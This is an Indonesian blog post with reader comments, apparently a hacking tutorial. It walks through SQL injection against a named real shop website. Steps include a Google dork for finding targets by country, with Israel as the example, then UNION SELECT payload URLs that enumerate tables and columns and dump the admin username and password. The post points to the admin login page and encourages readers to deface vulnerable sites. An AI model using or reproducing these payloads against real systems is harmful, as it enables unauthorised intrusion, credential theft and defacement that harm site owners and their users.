1st cari target web yang mau dijadiin korban
caranya tuliskan dork ini di google
inurl:news.php?id= site:is >> buat nyari web target yg berasal dai israel.
keterangan is di belakang itu berarti israel,bisa digantii dengan negara lain.contoh my=>> malaysia,id =>> indonesia,jpg =>> jepang dll
dalam contoh ini aku pake situs yang sama kaya pas aku diajarin sama temen ku [thx ma plen pizzy]
target adalah http://www.eimearquinn.com/shop.php?id=96
2nd
kita tambahkan tanda ' tepat dibelakang angka id nya
http://www.eimearquinn.com/shop.php?id=96'
kalau muncul pesan eror pada sql nya,itu berarti ada bugs atau celahnya.Dan itu berarti kita bisa masuk kedalam buat ngacak2 tuh web.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY ItemID DESC' at line 1 tuh contoh pesan erornya.
3th mencari jumlah tabel yg ada di databasenya
di belakang nomor id nya kita tmbahkan+order+by+1/*
http://www.eimearquinn.com/shop.php?id=96+order+by+1
ternyata pakai angka satu pesan erornya hilang.Itu artinya angka yg kita tebak itu salah.Mari kita cari angka lain di atasnya sampai ketemu pesan eror itu dateng lagi.Dalam contoh ini ternyata pesan eror itu kluar di angka 15.BErarti jumlah tabel yg ada cuman 14.Kenapa nmr 14?? saatnya nalar anda yang bicara.wekekekeke
Kalau kita menghitung dari angka terkecil,maka kita mencari sampai kita nemu pesan eror,dan jumlah tabelnya itu adalah angka pas kita nemu pesan eror kurangi 1.
Dan apabila kita nyari dari angka besar,maka kita nyari angka yg ga ada pesan erornya.POkoknya gitulah,wkwkwkwkwk
4th kita cari kolom yg kebuka
caranya kita tambahkan +union+select pada akhir url
http://www.eimearquinn.com/shop.php?id=989%20union%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
disitu aku tulis angka 1-14 karena jumlah tabel yang ada pada databasenya adalah 14.
kita cari ada angka berapa yang keluar di halaman web tersebut,itulah tabel yang show.DIsini angka yg keluar adalah angka 6.
5th cari tau nama database n version nya
gantikan(user(),0x3a,database(),0x3a,version()) pada angka yang show tadi.
http://www.eimearquinn.com/shop.php?id=989 union select
1,2,3,4,5,>concat_ws(user(),0x3a,database(),0x3a,version()) 7,8,9,10,11,12,13,14/*
klo mnrt kus ie bgian ini kaya ga penting...ga tau juga sie...soalnya pas aku coba database ma version ga kepake hwhwhwhwh...
lanjut
6th cari nama tabel
ganti angka yg kluar dengan table_name, dan tambahkan +from+information_schema.tables+where+table_schema=database()+limit+0,1/* abis angka terakhir.
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,
3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/*
tulisan yg kluar itu adalah nama tabelnya admin_eq=>>> nama tabelnya.
7th cari column
hampir sama
angka yg show di ganti column_name
dan di belakang angka terakhir kita tambah +from+information_schema.columns+where+table_schema=database()+limit+0,1/*
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+0,1/*
trus limit+o.1 ganti sama limit+1,1
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+1,1/*
akan muncul user name
dan kalo di ganti limit+2,1
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+2,1/*
akan muncul password.
keterangan kalau pas cari column dah kluar banyak tulisan,maka cari yang berbau user name and password.BEda web beda yg kluar,maka beda cara.
8th mencari tau nama user name and password admin
http://www.eimearquinn.com/shop.php?id=989+union+select+1,2,3,4,5,concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_eq/*
angka 6 diganti sama concat(Username,0x3a,Password) karena pada column nya ada 2 kata itu yang aku curiga sebagai jalan buat nyari pass ma user name
di belakang ada admin_eq karena itulah nama tabel nya
tara....pass ma user name nya dah kluar.Silahkan tebak tebak sendiri dimanakah halaman buat log in admin.di sini halaman log inya ada di http://www.eimearquinn.com/admin/
URUT2an langkahnya
1.cari target pake dork inurl:news.php?id= site:is atau yg lain
2.tambahkan tanda 'pada akhir/belakang angka
3.tambahkan tanda
+union+select+tebak angka
http://www.eimearquinn.com/shop.php?id=96+order+by+100/*
4.cari tabel yg show
t%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*
5.cari nama user,database,version
http://www.eimearquinn.com/shop.php?id=989 union select
1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*
6 cari tau nama table
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/
7.cari tau nama tabel
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,
3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+w
here+table_schema=database()+limit+0,1/*
8 cari pass ma user name admin
http://www.eimearquinn.com/shop.php?id=989+union+select+1,2,3,4,5,
concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_e
keterangan perintah
+ =>> tanda buat spasi bisa diganti sama %20
/8 =>> tanda buat pengakhir perintah bisa diganti dengan --
ada banyak cara yang beda dengan cara ini,intinya sama aja urut urutanya,cuma beda cara.lain kali aku post kan cara yg lain yang aku tu,n udah aku coba.
saran : carilah bugs web,dan kalo emu web yg ada celahnya silahkan di deface,karena udah susah susah belajar ini,tapi jangan lupa buat ngingetin tuh admin buat nutup celah yang ada.Jangan jadi orang yang jahat.C U next post.
9 comments:
weleh weleh akhirnya nemu juga tutorial tentang ini..sedap mas..kalau ada update an nya lagi share ke kita kita ya.
iya nie biar gampang nyarinya ps mau beljar lagi..aku juga masih belajar...hehehe
bdw tuh nama asli ria safitri,atau sengaja nyindir nie...wkwkwkwkwk
mas kalo ada halaman web yang ga pake extensi php,tapi pake html tuh gimana mas?Jadinya kan ga ada id nya.Baik home ataupun di beberapa artikelnya semua pake extensi .[dot]html.mohon pencerahanya.
dork tuh buat apa sie??kok aku tulis persis sama itu malah larinya ke google.
tuh perintah perintahnya ga kudu sama kan??misal nya pas order by kita pake +,tapi pas union kita pake %20.
mohon jawabanya ya
makasih sharenya
nie anak tidur kali ya...di tungguin jawabanya mas...lain kali di bikin auto approfal aja deh...biar langsung bisa masuk.Sapa tau ada orang lain yg bisa jwabnya...
cara atas sama aja kan sama cara bawah???
@ don juan
wedew soal itu aku kurang paham mas..cuman setauku sql injection cuma bisa di jalanin kalo ada database nya.
@anonim
dork buat nyari sites korban.EMang nyarinya lewat google kali.
@ ria
bisa kok.silahkan pake sesuka hati,mau pake yg mana.Emang kadang ga isa kalo pake + tapi bisa kalo kita pake %20.Bdw rajin banget nongkrongin blog ane,jangan jangan ente ria....
@ anonim
sama sama.kita belajar bareng yuk
@ anonim
cara yg di bawah cuman inti dari cara yg diatas.Sama persis malah.CUman biar ga terlalu panjang aja.Moga moga gisa n gampang di mengerti
Poskan Komentar